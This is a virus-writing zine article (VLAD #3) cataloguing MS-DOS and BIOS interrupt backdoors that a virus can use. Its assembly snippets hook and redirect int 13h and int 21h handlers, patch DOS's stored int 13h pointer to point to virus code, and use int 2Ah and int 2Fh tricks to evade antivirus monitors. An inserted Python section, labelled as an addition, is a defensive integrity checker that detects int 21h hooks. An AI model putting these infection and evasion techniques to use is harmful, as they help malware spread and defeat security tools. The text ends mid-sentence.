Virus Labs & Distribution
VLAD #3 - Backdoors

   +--------+                         Qark/VLAD

   The information in this article concerns the backdoors in MS-DOS and
   BIOS that can be used and abused by a virus for its own ends!  Most
   of them concern the Int21h DOS services interrupt and Int13h Disk

   Int40h - The floppy disk handler gets relocated to Int40h by the Hard
	      disk BIOS and is called by Int 13h.  Int40h can be hooked and
	      used to infect floppy disks.  Be cautious when using this
	      because if no harddisk is present it isn't set.

   Int30h - This is not in fact an interrupt at all.  It is a far jump
	      to the original interrupt 21h handler that is stored at
	      the address of int30h.  It was originally used for the CP/M
	      emulation in earlier versions of DOS and remains there today.
	      If you look at the PSP information, at PSP:[5] is a 'call
	      to the DOS function dispatcher'.  It actually calls the int30h
	      we are talking about (but due to a Microsoft stuff up it misses
	      by two bytes).  There are two ways of using this backdoor; the
	      first way could be a really hard method for infection or a
	      good destructive payload.  You can use it directly by calling
	      it in an unusual fashion.  This function could be messed up by
	      some programs but I have yet to see it not work anywhere.
	      Thanx go out to John Switzer for supplying me with this
	      information although I'm sure he wouldn't appreciate its
	      use! :)

		Method One:
		  You can only use DOS functions AH=0 to 24h with this and
		  any functions that require AL can't be used.

		  Int21h        Proc    Near
		  ;Call this from your code with the same parameters
		  ; as the real DOS int 21h function.
		  ;Truly weird I'm sure you'll agree!

			mov     cl,ah                   ;It uses CL.
			mov     ax,offset return_addr   ;Stack is backwards
			push    ax
			push    cs
			pushf                           ;Flags are last!!

			db      0eah                    ;JMP FAR PTR 0000:00C0
			dw      0c0h                    ;30h * 4
			dw      0                       ;Interrupt table.
		  return_addr:
			ret                             ;Back to user.
		  Int21h        EndP

		Method Two:
		  This is different in that it uses the segment:offset
		  address of the Int30h to get the original 'proper' Int21h
		  that we are all used to.  This method is used by the
		  writers of the MG virus (who also wrote Creeping Death,
		  very talented and good researchers!)  Anyway you can work
		  that out yourself, that's why it's called research!
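
	      An added example, not from the VLAD article: the same fact
	      seen from the other side of the fence.  Because the far jump
	      in the int 30h slot (0000:00C0) points into the DOS dispatcher,
	      an integrity checker can use it as a reference for where DOS's
	      own int 21h code lives and flag an int 21h vector whose segment
	      has moved elsewhere.  The checker below works on a dump of the
	      1 KiB interrupt vector table; the dump itself, the segment
	      values and the "same segment" heuristic (DOS keeps both entry
	      points in its kernel code segment, at different offsets, so
	      only segments are compared) are constructed assumptions for
	      the example, not something the article states.

```python
import struct

IVT_SIZE = 1024          # 256 vectors * 4 bytes, starting at 0000:0000
INT21_SLOT = 0x21 * 4    # 0x84: offset word, then segment word
INT30_SLOT = 0x30 * 4    # 0xC0: holds "EA off off seg seg", a far JMP, not a vector


def read_vector(ivt, intno):
    """Return (segment, offset) of an interrupt vector from an IVT dump."""
    off, seg = struct.unpack_from("<HH", ivt, intno * 4)
    return seg, off


def read_call5_jump(ivt):
    """Decode the far JMP that DOS keeps in the int 30h slot.

    Returns (segment, offset) of the jump target, or None when the slot
    does not start with the 0xEA far-jump opcode (no DOS, or slot trashed).
    """
    if ivt[INT30_SLOT] != 0xEA:
        return None
    off, seg = struct.unpack_from("<HH", ivt, INT30_SLOT + 1)
    return seg, off


def check_int21_hook(ivt):
    """Heuristic: int 21h should live in the same segment as the CALL 5 target.

    A different segment means some resident code sits in front of DOS on
    int 21h.  'hooked' is None when the reference jump cannot be decoded.
    """
    seg21, off21 = read_vector(ivt, 0x21)
    target = read_call5_jump(ivt)
    hooked = None if target is None else (seg21 != target[0])
    return {"int21": (seg21, off21), "call5": target, "hooked": hooked}


def build_ivt(int21, call5=None):
    """Constructed IVT dump for the example (every other vector left zero)."""
    ivt = bytearray(IVT_SIZE)
    struct.pack_into("<HH", ivt, INT21_SLOT, int21[1], int21[0])
    if call5 is not None:
        ivt[INT30_SLOT] = 0xEA
        struct.pack_into("<HH", ivt, INT30_SLOT + 1, call5[1], call5[0])
    return bytes(ivt)


def fmt(addr):
    return "none" if addr is None else "%04X:%04X" % addr


if __name__ == "__main__":
    # Constructed values: 0116h is taken as the DOS kernel segment,
    # 9F80h as the segment of some resident program that hooked int 21h.
    clean = build_ivt(int21=(0x0116, 0x109E), call5=(0x0116, 0x10A0))
    hooked = build_ivt(int21=(0x9F80, 0x0123), call5=(0x0116, 0x10A0))
    for name, dump in (("clean", clean), ("hooked", hooked)):
        r = check_int21_hook(dump)
        print("%-6s int 21h -> %s  CALL 5 -> %s  hooked=%s"
              % (name, fmt(r["int21"]), fmt(r["call5"]), r["hooked"]))
```

	      Feed it a real dump (for instance 1 KiB read from physical
	      address 0 under an emulator) and the two addresses reported
	      are the ones the two methods above rely on; the checker only
	      says whether they still agree.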

   Int2fh - When DOS gets loaded it hooks int13h and saves the original
   ah=13h     addresses for its own use.  When this function is called it
	      returns two addresses where one is slightly closer to the
	      original int13h than the other, but I'm not too sure which is
	      the closer of the two (they are often equal).  If you play
	      with this yourself look it up in Ralf Brown's Interrupt List; you
	      can probably point the DOS calls to your virus if you do it right.

	      To grab the original int13h without messing up DOS:

			mov     ah,13h
			int     2fh     ;Get the int13h's

			push    es      ;Save them
			push    ds
			push    dx
			push    bx

			int     2fh     ;Put them back to what they were.

			pop     bx      ;Now we've got our handlers.
			pop     dx
			pop     ds
			pop     es

	      ;From here you can either choose to use ES:BX or DS:DX
	      ;as your int13h.

   Seg70h - Segment 70h is used by DOS.  All DOS disk access passes through
	      it at some time.  All you have to do is scan through it for
	      the bytes of the different calls.  This method was first
	      used by the Creeping Death virus and is used in the 1984
	      (listed as 'ignorant' by CARO) and Daemon viruses.  I'd
	      suggest running through this with a debugger and having a
	      look to work out what's going on.  DOS has been using 70:B4
	      to store the original Int 13h since DOS 3.3.

		mov     ax,70h
		mov     ds,ax
		mov     si,2
	first_backdoor:
		or      si,si
		jz      wherever                ;Wrapped round the segment, not found.

		dec     si                      ;SI-1
		lodsw                           ;DS:[SI] to AX  SI+2

		cmp     ax,1effh                ;FF1E = CALL FAR PTR [xxxx]
		jnz     first_backdoor

		cmp     word ptr [si],0b4h      ;This is just there :)
		jnz     first_backdoor

		jmp     set_fake_int13          ;We've found it!

	set_fake_int13:
		mov     si,[si]                 ;SI=Where the address is
		;save the int13h into the virus
		mov     cs:orig_store,word ptr [si]
		mov     cs:orig_store+2,word ptr [si+2]
		;point it to our virus
		mov     word ptr [si],offset our_int13
		mov     word ptr [si+2],cs

		;ret or whatever...

   Int2fh - Have a look at this interrupt in Ralf Brown's Interrupt List (a
	      must for every virus programmer); it can do ALL the interrupt
	      21h functions!  The only problem is working out the DOS stacks
	      and so on.  It is handy for bypassing AV monitors, but it is
	      much too huge to go into in any detail.

   BIOS   - Within BIOS lurk a number of stationary entry points to
   entry      interrupts.  There are a few problems with these, as a lot
   points     of BIOSes are incompatible and QEMM won't work with them,
	      but they can be useful because there isn't ANYTHING that
	      can be done to stop it.

	      Here is a list of addresses that are guaranteed not to
	      work half the time but have a look anyway.

		 F000:EC59      Floppy disk int 13h
		 F000:F859      Int 15h, sometimes useful

   Int2ah - This is called by Int 21h on every file related function.  By
   ah=82h     modifying the stack or certain registers you can change the
	      function that was called to whatever you want.  DOS stores
	      the function multiplied by two in BL (e.g. Int 21h AH=40h will
	      be BL=80h when the int 2ah is called).  If you change this
	      BL to another function it should fool most AV monitors.  This
	      may only work for some versions of DOS.

   Int21h - If you call this service you can do any DOS function.  Have a
   ax=5d00h   look!  All you have to do is set your registers up in a table.
	      It should be easy to write a basic simulated int21h using

   Anymore ?  Not that I can think of!  If you know any... tell me!!
